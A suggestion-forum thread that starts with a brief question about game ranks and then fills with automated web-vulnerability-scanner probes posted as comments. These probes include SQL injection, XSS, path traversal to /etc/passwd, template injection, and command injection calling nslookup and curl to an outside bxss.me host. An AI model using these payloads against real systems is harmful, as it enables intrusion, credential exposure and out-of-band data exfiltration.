Feedback

Submit suggestion

Rankings by heyo - 154 months ago

How do you know what rank you are and how far you have until your next level up?

493 agree

Vote
  • the destructor

    good question...
  • BeyPokéDig

    I think nobody knows for sure, because nobody wrote down their exp when they gained a rank.
  • :-:Bluehawk1224:-:

    Well... All I know is that the highest rank is Kng...
  • deleted

    No, the highest rank is GA.
  • Boogerflicker

    No the highest rank is Kng. I have almost 1 Billion score and I stopped at Kng. with 30x Multiplier
  • deleted

    now the highest rank is TL. with 50x Multiplayer :D
  • deleted

    Time To Lord
  • JJJ3QQQ

    JJJ30QQQ
  • WfxYANoW

    1
  • WfxYANoW

    1<esi:include src="http://bxss.me/rpb.png"/>
  • WfxYANoW

    ${10000352+9999804}
  • WfxYANoW

    http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  • ${10000337+9999210}

    1
  • WfxYANoW

    1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  • WfxYANoW

    ../../../../../../../../../../../../../../etc/passwd
  • WfxYANoW

    response.write(9725793*9399182)
  • WfxYANoW

    ../../../../../../../../../../../../../../windows/win.ini
  • WfxYANoW

    1Ch74cn3fCO
  • WfxYANoW

    file:///etc/passwd
  • WfxYANoW

    Http://bxss.me/t/fit.txt
  • Anonymous

    1
  • 1DtA5voIkiO

    1
  • WfxYANoW

    1
  • WfxYANoW

    echo exrqvw$()\ lhznxh\nz^xyu||a #' &echo exrqvw$()\ lhznxh\nz^xyu||a #|" &echo exrqvw$()\ lhznxh\nz^xyu||a #
  • WfxYANoW

    '+response.write(9725793*9399182)+'
  • WfxYANoW

    ../1
  • WfxYANoW

    &echo hbokxh$()\ israow\nz^xyu||a #' &echo hbokxh$()\ israow\nz^xyu||a #|" &echo hbokxh$()\ israow\nz^xyu||a #
  • WfxYANoW

    http://bxss.me/t/fit.txt?.jpg
  • WfxYANoW

    "+response.write(9725793*9399182)+"
  • WfxYANoW

    1&echo sdbbrz$()\ bbrbjd\nz^xyu||a #' &echo sdbbrz$()\ bbrbjd\nz^xyu||a #|" &echo sdbbrz$()\ bbrbjd\nz^xyu||a #
  • WfxYANoW

    /etc/shells
  • WfxYANoW

    igsiJF5R
  • response.write(9039990*9666780)

    1
  • WfxYANoW

    GsuWxDEa: OHaWUy7b
  • WfxYANoW

    1&n929740=v973468
  • OBL4Ecgh

    1
  • file:///etc/passwd

    1
  • WfxYANoW

    ../../../../../../../../../../../../../../etc/shells
  • '+response.write(9039990*9666780)+'

    1
  • u0ltGYaR: 9zcbcHXs

    1
  • WfxYANoW

    1
  • WfxYANoW&n963471=v993437

    1
  • WfxYANoW

    |echo ssimwq$()\ gktfck\nz^xyu||a #' |echo ssimwq$()\ gktfck\nz^xyu||a #|" |echo ssimwq$()\ gktfck\nz^xyu||a #
  • dFZwbTBraGk=

    1
  • "+response.write(9039990*9666780)+"

    1
  • ../WfxYANoW

    1
  • WfxYANoW

    )
  • WfxYANoW

    1|echo ukbnxn$()\ sejann\nz^xyu||a #' |echo ukbnxn$()\ sejann\nz^xyu||a #|" |echo ukbnxn$()\ sejann\nz^xyu||a #
  • WfxYANoW

    '.gethostbyname(lc('hitau'.'cieagatv4c0ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(78).chr(111).chr(73).'
  • WfxYANoW

    1
  • WfxYANoW

    (nslookup -q=cname hitfeajfclnpo18b3b.bxss.me||curl hitfeajfclnpo18b3b.bxss.me))
  • WfxYANoW

    ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  • WfxYANoW

    $(nslookup -q=cname hitickxyzmmklaa21c.bxss.me||curl hitickxyzmmklaa21c.bxss.me)
  • WfxYANoW

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • WfxYANoW

    ".gethostbyname(lc("hitfi"."stzoiqdq12684.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(67).chr(110).chr(72)."
  • WfxYANoW

    &nslookup -q=cname hitzahbsvqzff72968.bxss.me&'\"`0&nslookup -q=cname hitzahbsvqzff72968.bxss.me&`'
  • WfxYANoW

    !(()&&!|*|*|
  • WfxYANoW

    &(nslookup -q=cname hitmnzzheazlpa3f05.bxss.me||curl hitmnzzheazlpa3f05.bxss.me)&'\"`0&(nslookup -q=cname hitmnzzheazlpa3f05.bxss.me||curl hitmnzzheazlpa3f05.bxss.me)&`'
  • WfxYANoW

    gethostbyname(lc('hitao'.'ejbgrcqv65b14.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(87).chr(109).chr(82)
  • WfxYANoW

    c:/windows/win.ini
  • WfxYANoW

    ^(#$!@#$)(()))******
  • WfxYANoW

    ';print(md5(31337));$a='
  • WfxYANoW

    bxss.me
  • WfxYANoW

    '"
  • WfxYANoW

    ";print(md5(31337));$a="
  • WfxYANoW

    |(nslookup -q=cname hitkhsdwssqku9a70a.bxss.me||curl hitkhsdwssqku9a70a.bxss.me)
  • WfxYANoW

    xfs.bxss.me
  • WfxYANoW

    <!--
  • xfs.bxss.me

    1
  • WfxYANoW

    1'"()&%<zzz><ScRiPt >54rt(9028)</ScRiPt>
  • WfxYANoW

    HttP://bxss.me/t/xss.html?%00
  • WfxYANoW

    '"()
  • )

    1
  • WfxYANoW

    "+"A".concat(70-3).concat(22*4).concat(110).concat(79).concat(119).concat(80)+(require"socket" Socket.gethostbyname("hitkb"+"fplkhxfhb2f26.bxss.me.")[3].to_s)+"
  • WfxYANoW

    1'&&sleep(27*1000)*qeqxdl&&'
  • '"

    1
  • !(()&&!|*|*|

    1
  • WfxYANoW

    1"&&sleep(27*1000)*grajbk&&"
  • <!--

    1
  • WfxYANoW

    '"()&%<zzz><ScRiPt >54rt(9916)</ScRiPt>
  • WfxYANoW

    bxss.me/t/xss.html?%00
  • ^(#$!@#$)(()))******

    1
  • WfxYANoW

    `(nslookup -q=cname hitnxilnhnnaqcdc8e.bxss.me||curl hitnxilnhnnaqcdc8e.bxss.me)`
  • WfxYANoW

    comment
  • WfxYANoW

    ${@print(md5(31337))}
  • WfxYANoW

    comment
  • WfxYANoW

    ;(nslookup -q=cname hitrwvfpmgubne469b.bxss.me||curl hitrwvfpmgubne469b.bxss.me)|(nslookup -q=cname hitrwvfpmgubne469b.bxss.me||curl hitrwvfpmgubne469b.bxss.me)&(nslookup -q=cname hitrwvfpmgubne469b.bxss.me||curl hitrwvfpmgubne469b.bxss.me)
  • WfxYANoW

    ${@print(md5(31337))}\
  • WfxYANoW

    1'||sleep(27*1000)*xiypob||'
  • 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

    1
  • WfxYANoW

    1"||sleep(27*1000)*yixoht||"
  • WfxYANoW

    '+'A'.concat(70-3).concat(22*4).concat(113).concat(79).concat(104).concat(86)+(require'socket' Socket.gethostbyname('hitdm'+'vlirhzxfc75c2.bxss.me.')[3].to_s)+'
  • Http://bxss.me/t/fit.txt

    1
  • WfxYANoW

    '.print(md5(31337)).'
  • WfxYANoW

    |(nslookup${IFS}-q${IFS}cname${IFS}hitinhxadifnh52f04.bxss.me||curl${IFS}hitinhxadifnh52f04.bxss.me)
  • WfxYANoW

    1
  • WfxYANoW

    comment/.
  • http://bxss.me/t/fit.txt?.jpg

    1
  • WfxYANoW

    19702911
  • WfxYANoW

    &(nslookup${IFS}-q${IFS}cname${IFS}hitsbjxolozjxea435.bxss.me||curl${IFS}hitsbjxolozjxea435.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsbjxolozjxea435.bxss.me||curl${IFS}hitsbjxolozjxea435.bxss.me)&`'
  • comment

    1
  • HttP://bxss.me/t/xss.html?%00

    1
  • /etc/shells

    1
  • WfxYANoW

    'A'.concat(70-3).concat(22*4).concat(111).concat(76).concat(103).concat(79)+(require'socket' Socket.gethostbyname('hittk'+'hevmvlaq67778.bxss.me.')[3].to_s)
  • WfxYANoW

    bfg9348<s1﹥s2ʺs3ʹhjl9348
  • comment

    1
  • ';print(md5(31337));$a='

    1
  • bxss.me/t/xss.html?%00

    1
  • '"()

    1
  • ";print(md5(31337));$a="

    1
  • ${@print(md5(31337))}

    1
  • WfxYANoW'&&sleep(27*1000)*gwcdbb&&'

    1
  • WfxYANoW"&&sleep(27*1000)*bxtnnb&&"

    1
  • c:/windows/win.ini

    1
  • ${@print(md5(31337))}\

    1
  • bxss.me

    1
  • WfxYANoW

    <%={{={@{#{${dfb}}%>
  • comment/.

    1
  • '.print(md5(31337)).'

    1
  • WfxYANoW'||sleep(27*1000)*kwxqgu||'

    1
  • WfxYANoW"||sleep(27*1000)*pumqsy||"

    1
  • WfxYANoW

    <th:t="${dfb}#foreach
  • WfxYANoW

    1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  • WfxYANoW

    1
  • WfxYANoW

    dfb{{98991*97996}}xca
  • WfxYANoW

    dfb[[${98991*97996}]]xca
  • WfxYANoW

    dfb__${98991*97996}__::.x
  • WfxYANoW

    "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  • WfxYANoW

    1<ScRiPt >54rt(9300)</ScRiPt>
  • WfxYANoW

    1<WS2WNB>XWJET[!+!]</WS2WNB>
  • WfxYANoW

    1<script>54rt(9715)</script>
  • WfxYANoW

    1<script>54rt(9313)</script>9313
  • WfxYANoW

    1<ScR<ScRiPt>IpT>54rt(9216)</sCr<ScRiPt>IpT>
  • WfxYANoW

    1<ScRiPt >54rt(9695)</ScRiPt>
  • WfxYANoW

    1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9823></ScRiPt>
  • WfxYANoW

    1<ScRiPt >54rt(9952)</ScRiPt>
  • WfxYANoW

    1
  • WfxYANoW

    1<isindex type=image src=1 onerror=54rt(9843)>
  • WfxYANoW

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9466'>
  • WfxYANoW

    1<body onload=54rt(9055)>
  • WfxYANoW

    1<img src=//xss.bxss.me/t/dot.gif onload=54rt(9321)>
  • WfxYANoW

    1<img src=xyz OnErRor=54rt(9402)>
  • WfxYANoW

    1<img/src=">" onerror=alert(9589)>
  • WfxYANoW

    1My2JpGJs
  • WfxYANoW

    %31%3C%53%63%52%69%50%74%20%3E%35%34%72%74%289350%29%3C%2F%73%43%72%69%70%54%3E
  • WfxYANoW

    1\u003CScRiPt\54rt(9843)\u003C/sCripT\u003E
  • WfxYANoW

    1&lt;ScRiPt&gt;54rt(9371)&lt;/sCripT&gt;
  • WfxYANoW

    1<input autofocus onfocus=54rt(9162)>
  • WfxYANoW

    <a HrEF=http://xss.bxss.me></a>
  • WfxYANoW

    <a HrEF=jaVaScRiPT:>
  • WfxYANoW

    1}body{zzz:Expre/**/SSion(54rt(9980))}
  • WfxYANoW

    1K3mQn <ScRiPt >54rt(9528)</ScRiPt>
  • WfxYANoW

    1
  • WfxYANoW

    -1 OR 2+273-273-1=0+0+0+1 --
  • WfxYANoW

    1<WEYGK9>EILQR[!+!]</WEYGK9>
  • WfxYANoW

    -1 OR 2+470-470-1=0+0+0+1
  • WfxYANoW

    -1' OR 2+660-660-1=0+0+0+1 --
  • WfxYANoW

    1<ifRAme sRc=9450.com></IfRamE>
  • WfxYANoW

    -1' OR 2+193-193-1=0+0+0+1 or 'PSdeL26x'='
  • WfxYANoW

    1<aTODTCJ x=9146>
  • WfxYANoW

    -1" OR 2+855-855-1=0+0+0+1 --
  • WfxYANoW

    1<img sRc='http://attacker-9397/log.php?
  • WfxYANoW

    1<az8mvxv<
  • WfxYANoW'"()&%<zzz><ScRiPt >54rt(9155)</ScRiPt>

    1
  • '"()&%<zzz><ScRiPt >54rt(9698)</ScRiPt>

    1
  • WfxYANoW9957937

    1
  • bfg2706<s1﹥s2ʺs3ʹhjl2706

    1
  • <%={{={@{#{${dfb}}%>

    1
  • <th:t="${dfb}#foreach

    1
  • 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

    1
  • dfb{{98991*97996}}xca

    1
  • dfb[[${98991*97996}]]xca

    1
  • dfb__${98991*97996}__::.x

    1
  • "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

    1
  • WfxYANoW<ScRiPt >54rt(9100)</ScRiPt>

    1
  • WfxYANoW<W0H6ZL>OPJ0B[!+!]</W0H6ZL>

    1
  • WfxYANoW<script>54rt(9042)</script>

    1
  • WfxYANoW<script>54rt(9522)</script>9522

    1
  • WfxYANoW

    1*if(now()=sysdate(),sleep(15),0)
  • WfxYANoW<ScRiPt >54rt(9279)</ScRiPt>

    1
  • WfxYANoW<ScRiPt >54rt(9492)</ScRiPt>

    1
  • WfxYANoW<body onload=54rt(9877)>

    1
  • WfxYANoW<img src=xyz OnErRor=54rt(9231)>

    1
  • WfxYANoW<img/src=">" onerror=alert(9047)>

    1
  • WfxYANoW\u003CScRiPt\54rt(9667)\u003C/sCripT\u003E

    1
  • WfxYANoW&lt;ScRiPt&gt;54rt(9046)&lt;/sCripT&gt;

    1
  • WfxYANoW

    10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
  • WfxYANoW<input autofocus onfocus=54rt(9298)>

    1
  • <a HrEF=http://xss.bxss.me></a>

    1
  • <a HrEF=jaVaScRiPT:>

    1
  • WfxYANoW}body{zzz:Expre/**/SSion(54rt(9010))}

    1
  • WfxYANoWiZX0g <ScRiPt >54rt(9462)</ScRiPt>

    1
  • WfxYANoW<WMCPEX>FLUMG[!+!]</WMCPEX>

    1
  • WfxYANoW<ifRAme sRc=9001.com></IfRamE>

    1
  • WfxYANoW<ajOAPgN x=9779>

    1
  • WfxYANoW<img sRc='http://attacker-9725/log.php?

    1
  • WfxYANoW<aD3fARA<

    1
  • WfxYANoW

    10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
  • WfxYANoW

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • WfxYANoW

    1-1; waitfor delay '0:0:15' --
  • WfxYANoW

    1-1); waitfor delay '0:0:15' --
  • WfxYANoW

    1-1 waitfor delay '0:0:15' --
  • WfxYANoW

    1JIYHRczq'; waitfor delay '0:0:15' --
  • WfxYANoW

    1-1 OR 355=(SELECT 355 FROM PG_SLEEP(15))--
  • WfxYANoW

    1-1) OR 840=(SELECT 840 FROM PG_SLEEP(15))--
  • WfxYANoW

    1-1)) OR 15=(SELECT 15 FROM PG_SLEEP(15))--
  • WfxYANoW

    1dLJDaPkp' OR 48=(SELECT 48 FROM PG_SLEEP(15))--
  • WfxYANoW

    1F0gY3XHh') OR 486=(SELECT 486 FROM PG_SLEEP(15))--
  • WfxYANoW

    1a5JVNzUs')) OR 383=(SELECT 383 FROM PG_SLEEP(15))--
  • WfxYANoW

    1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • WfxYANoW

    1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • WfxYANoW

    1'"
  • WfxYANoW

    @@N8EZq
  • WfxYANoW

    1
  • WfxYANoW

    1
  • WfxYANoWZpaB9NTY

    1
  • WfxYANoW

    1
  • -1 OR 2+464-464-1=0+0+0+1 --

    1
  • -1 OR 2+412-412-1=0+0+0+1

    1
  • -1' OR 2+684-684-1=0+0+0+1 --

    1
  • -1' OR 2+604-604-1=0+0+0+1 or 'TFiVxX67'='

    1
  • -1" OR 2+113-113-1=0+0+0+1 --

    1
  • if(now()=sysdate(),sleep(15),0)

    1
  • WfxYANoW-1 waitfor delay '0:0:15' --

    1
  • WfxYANoWsNfj8tU0'; waitfor delay '0:0:15' --

    1
  • WfxYANoW'"

    1
  • @@ufFOo

    1
  • Pecedec150

    555-555-0199@example.com
  • Pecedec150

    555-555-0199@example.com
  • vlnlxsts

    1
  • kpilanpl

    response.write(9430288*9620135)
  • jjmqgqjb

    1
  • kpilanpl

    '+response.write(9430288*9620135)+'
  • jjmqgqjb

    1
  • qrtpwbjr

    set|set&set
  • rjuplhyy

    x3GMUwGh
  • kpilanpl

    "+response.write(9430288*9620135)+"
  • jjmqgqjb

    eKLTpGYo
  • qrtpwbjr

    $(nslookup U0RmDuYE)
  • n7RRQ7lK

    1
  • gukwxlon

    ../../../../../../../../../../etc/passwd
  • response.write(9195248*9282122)

    1
  • jjmqgqjb

    -1 OR 2+236-236-1=0+0+0+1 --
  • qrtpwbjr

    &nslookup 5j3EewHN&'\"`0&nslookup 5j3EewHN&`'
  • hbuvdpmj

    1
  • gukwxlon

    ../../../../../../../../../../../../../../../proc/version
  • bpppfnew

    ${10000063+9999914}
  • '+response.write(9195248*9282122)+'

    1
  • jjmqgqjb

    -1 OR 2+577-577-1=0+0+0+1
  • set|set&set

    1
  • gukwxlon

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  • ${10000128+9999228}

    1
  • "+response.write(9195248*9282122)+"

    1
  • jjmqgqjb

    -1' OR 2+931-931-1=0+0+0+1 --
  • $(nslookup qkN4dtqU)

    1
  • gukwxlon

    ../../../../../../../../../../etc/passwd.jpg
  • htksagft

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • RHljV29hR2Y=

    1
  • jjmqgqjb

    -1' OR 2+288-288-1=0+0+0+1 or 'NVOWRZJX'='
  • &nslookup 5loahUII&'\"`0&nslookup 5loahUII&`'

    1
  • qnpampbu

    1&n950466=v994151
  • gukwxlon

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  • htksagft

    1some_inexistent_file_with_long_name.jpg
  • cjcsmrrt

    )
  • jjmqgqjb

    -1" OR 2+414-414-1=0+0+0+1 --
  • hbuvdpmj

    1
  • gukwxlon

    /../..//../..//../..//../..//../..//etc/passwd.jpg
  • htksagft

    Http://testasp.vulnweb.com/t/fit.txt
  • cjcsmrrt

    !(()&&!|*|*|
  • jjmqgqjb

    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
  • ajljvenm

    '"()
  • ayvnfxfj&n905738=v979243

    1
  • Anonymous

    1
  • gukwxlon

    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  • htksagft

    http://testasp.vulnweb.com/t/fit.txt?.jpg
  • cjcsmrrt

    ^(#$!@#$)(()))******
  • jjmqgqjb

    if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
  • gukwxlon

    /etc/passwd
  • htksagft

    testasp.vulnweb.com
  • )

    1
  • jjmqgqjb

    (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/
  • '"()

    1
  • roraqcra

    ;print(md5(acunetix_wvs_security_test));
  • gukwxlon

    %2fetc%2fpasswd
  • !(()&&!|*|*|

    1
  • jjmqgqjb

    (select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
  • rksqabxp

    http://testasp.vulnweb.com/t/xss.html?%00.jpg
  • roraqcra

    ';print(md5(acunetix_wvs_security_test));$a='
  • wlswhkoc

    1
  • gukwxlon

    /.././.././.././.././.././.././.././../etc/./passwd%00
  • 1some_inexistent_file_with_long_name.jpg

    1
  • ^(#$!@#$)(()))******

    1
  • jjmqgqjb

    -1; waitfor delay '0:0:8' --
  • http://testasp.vulnweb.com/t/xss.html?%00.jpg

    1
  • anmdrmag

    http://hitPfqB2EyHpP.bxss.me/
  • roraqcra

    ";print(md5(acunetix_wvs_security_test));$a="
  • wlswhkoc

    comment
  • gukwxlon

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  • Http://testasp.vulnweb.com/t/fit.txt

    1
  • jruxyttq

    1
  • jjmqgqjb

    -1); waitfor delay '0:0:8' --
  • gfsknwhf

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • roraqcra

    ${@print(md5(acunetix_wvs_security_test))}
  • http://hit7UHiVhNcWn.bxss.me/

    1
  • wlswhkoc

    comment
  • gukwxlon

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  • http://testasp.vulnweb.com/t/fit.txt?.jpg

    1
  • jruxyttq

    1'"
  • jjmqgqjb

    1 waitfor delay '0:0:8' --
  • roraqcra

    ${@print(md5(acunetix_wvs_security_test))}\
  • motsmvtu

    /www.vulnweb.com
  • wlswhkoc

    comment/.
  • testasp.vulnweb.com

    1
  • jruxyttq

    \
  • jjmqgqjb

    1LYu2cVq'; waitfor delay '0:0:12' --
  • ehldaxsc

    '"
  • ;print(md5(acunetix_wvs_security_test));

    1
  • /www.vulnweb.com

    1
  • wlswhkoc

    1
  • gukwxlon

    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
  • lusvueeq

    1'"()&%<acx><ScRiPt >hgRf(9794)</ScRiPt>
  • jjmqgqjb

    -1;select pg_sleep(12); --
  • ehldaxsc

    <!--
  • ';print(md5(acunetix_wvs_security_test));$a='

    1
  • comment

    1
  • gukwxlon

    file:///etc/passwd
  • jruxyttq

    @@9IymN
  • jjmqgqjb

    -1);select pg_sleep(4); --
  • '"

    1
  • ";print(md5(acunetix_wvs_security_test));$a="

    1
  • comment

    1
  • gukwxlon

    /\../\../\../\../\../\../\../etc/passwd
  • lusvueeq

    '"()&%<acx><ScRiPt >hgRf(9031)</ScRiPt>
  • jruxyttq

    JyI=
  • jjmqgqjb

    -1);select pg_sleep(0); --
  • <!--

    1
  • ${@print(md5(acunetix_wvs_security_test))}

    1
  • comment/.

    1
  • gukwxlon

    WEB-INF/web.xml
  • jjmqgqjb

    -1));select pg_sleep(4); --
  • ${@print(md5(acunetix_wvs_security_test))}\

    1
  • gukwxlon

    /WEB-INF/web.xml
  • lusvueeq

    1_9254
  • jjmqgqjb

    -1));select pg_sleep(0); --
  • gukwxlon

    WEB-INF\web.xml
  • jruxyttq

    (select convert(int,CHAR(65)))
  • jjmqgqjb

    IM3UjehP';select pg_sleep(4); --
  • ../../../../../../../../../../etc/passwd

    1
  • lusvueeq

    acu10806<s1﹥s2ʺs3ʹuca10806
  • jruxyttq

    1
  • jjmqgqjb

    jL73h71k');select pg_sleep(4); --
  • 1'"

    1
  • jjmqgqjb

    qAHStBg0'));select pg_sleep(4); --
  • \

    1
  • jjmqgqjb

    1
  • ../../../../../../../../../../etc/passwd.jpg

    1
  • jjmqgqjb

    1
  • lusvueeq

    {{9999901*9999906}}
  • @@9vNl7

    1
  • wNxoKJfE

    1
  • JyI=

    1
  • -1 OR 2+847-847-1=0+0+0+1 --

    1
  • lusvueeq

    1<ScRiPt >hgRf(9597)</ScRiPt>
  • .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

    1
  • -1 OR 2+115-115-1=0+0+0+1

    1
  • /etc/passwd

    1
  • -1' OR 2+38-38-1=0+0+0+1 --

    1
  • lusvueeq

    1<WRXFJZ>X7WNI[!+!]</WRXFJZ>
  • %2fetc%2fpasswd

    1
  • (select convert(int,CHAR(65)))

    1
  • -1' OR 2+233-233-1=0+0+0+1 or 'lFZXj1Vu'='

    1
  • -1" OR 2+816-816-1=0+0+0+1 --

    1
  • lusvueeq

    1<script>hgRf(9504)</script>
  • lusvueeq

    1<ScR<ScRiPt>IpT>hgRf(9067)</sCr<ScRiPt>IpT>
  • 1 waitfor delay '0:0:4' --

    1
  • XqROoVuk'; waitfor delay '0:0:4' --

    1
  • lusvueeq

    1<ScRiPt >hgRf(9585)</ScRiPt>
  • file:///etc/passwd

    1
  • apLfiTtZ';select pg_sleep(4); --

    1
  • /\../\../\../\../\../\../\../etc/passwd

    1
  • eBonXLVW');select pg_sleep(4); --

    1
  • lusvueeq

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9840></ScRiPt>
  • WEB-INF/web.xml

    1
  • xmi5wv2n'));select pg_sleep(4); --

    1
  • /WEB-INF/web.xml

    1
  • lusvueeq

    1<ScRiPt >hgRf(9103)</ScRiPt>
  • WEB-INF\web.xml

    1
  • lusvueeq

    1<video><source onerror="javascript:hgRf(9558)">
  • lusvueeq

    1<isindex type=image src=1 onerror=hgRf(9811)>
  • lusvueeq

    1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9508'>
  • lusvueeq

    1<body onload=hgRf(9227)>
  • lusvueeq

    1<img src=//testasp.vulnweb.com/t/dot.gif onload=hgRf(9482)>
  • lusvueeq

    1<img src=xyz OnErRor=hgRf(9961)>
  • lusvueeq

    1<img/src=">" onerror=alert(9838)>
  • lusvueeq

    %31%3C%53%63%52%69%50%74%20%3E%68%67%52%66%289052%29%3C%2F%73%43%72%69%70%54%3E
  • lusvueeq

    1\u003CScRiPt\hgRf(9557)\u003C/sCripT\u003E
  • lusvueeq

    1&lt;ScRiPt&gt;hgRf(9309)&lt;/sCripT&gt;
  • lusvueeq

    1<input autofocus onfocus=hgRf(9376)>
  • lusvueeq

    <a HrEF=http://www.vulnweb.com></a>
  • lusvueeq

    <a HrEF=jaVaScRiPT:>
  • lusvueeq

    [url=http://www.vulnweb.com][/url]
  • lusvueeq

    1<img<!-- --> src=x onerror=alert(9239);//><!-- -->
  • lusvueeq

    1}body{acu:Expre/**/SSion(hgRf(9155))}
  • lusvueeq

    1<% contenteditable onresize=hgRf(9216)>
  • lusvueeq

    1_hxZmE <ScRiPt >hgRf(9275)</ScRiPt>
  • lusvueeq

    1<WYPSFP>6HZD3[!+!]</WYPSFP>
  • lusvueeq

    1<ifRAme sRc=9564.com></IfRamE>
  • lusvueeq

    1<7EvwbR x=9341>
  • lusvueeq

    1<img sRc='http://attacker-9818/log.php?
  • lusvueeq'"()&%<acx><ScRiPt >hgRf(9058)</ScRiPt>

    1
  • '"()&%<acx><ScRiPt >hgRf(9685)</ScRiPt>

    1
  • lusvueeq_9808

    1
  • acu4251<s1﹥s2ʺs3ʹuca4251

    1
  • {{9999941*10000302}}

    1
  • lusvueeq<ScRiPt >hgRf(9798)</ScRiPt>

    1
  • lusvueeq<WFJQCL>TZ524[!+!]</WFJQCL>

    1
  • lusvueeq<script>hgRf(9164)</script>

    1
  • lusvueeq<ScRiPt >hgRf(9024)</ScRiPt>

    1
  • lusvueeq<ScRiPt >hgRf(9121)</ScRiPt>

    1
  • lusvueeq<body onload=hgRf(9855)>

    1
  • lusvueeq<img src=xyz OnErRor=hgRf(9530)>

    1
  • lusvueeq<img/src=">" onerror=alert(9227)>

    1
  • lusvueeq\u003CScRiPt\hgRf(9767)\u003C/sCripT\u003E

    1
  • lusvueeq&lt;ScRiPt&gt;hgRf(9124)&lt;/sCripT&gt;

    1
  • lusvueeq<input autofocus onfocus=hgRf(9334)>

    1
  • <a HrEF=http://www.vulnweb.com></a>

    1
  • <a HrEF=jaVaScRiPT:>

    1
  • [url=http://www.vulnweb.com][/url]

    1
  • lusvueeq}body{acu:Expre/**/SSion(hgRf(9389))}

    1
  • lusvueeq<% contenteditable onresize=hgRf(9386)>

    1
  • lusvueeq_vJVC3 <ScRiPt >hgRf(9003)</ScRiPt>

    1
  • lusvueeq<WAZQYJ>ZN6RJ[!+!]</WAZQYJ>

    1
  • lusvueeq<ifRAme sRc=9611.com></IfRamE>

    1
  • lusvueeq<tPf9gc x=9535>

    1
  • lusvueeq<img sRc='http://attacker-9752/log.php?

    1

Comment

Top